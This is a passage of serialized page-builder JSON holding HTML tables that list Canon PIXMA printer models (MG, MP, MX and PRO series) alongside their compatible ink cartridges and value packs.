(Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP610<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP628<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP638<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP648<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800R<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP810<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP830<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"7\\\" align=\\\"center\\\">PIXMA MP970<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP988<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP996<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n  <tr align=\\\"center\\\">\\n    <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n    <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX308<\\/td>\\n    <td>CL-41 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-831 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40\\/CL-41 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-830 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX328<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX338<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX347<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX366<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX426<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX876<\\/td>\\n    <td>CLI-821 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-820 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX886<\\/td>\\n    <td>CLI-726 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-725 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA PRO-1<\\/td>\\n    <td>PGI-29 (Chroma Optimizer)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Dark Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Light Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Matte Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Red)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Yellow)<\\/td>\\n  <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA PRO-10<\\/td>\\n      <td>PGI-72 (Chroma Optimizer)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Matte Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Red)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"8\\\" align=\\\"center\\\">PIXMA PRO-100<\\/td>\\n      <td>CLI-42 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Light Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" 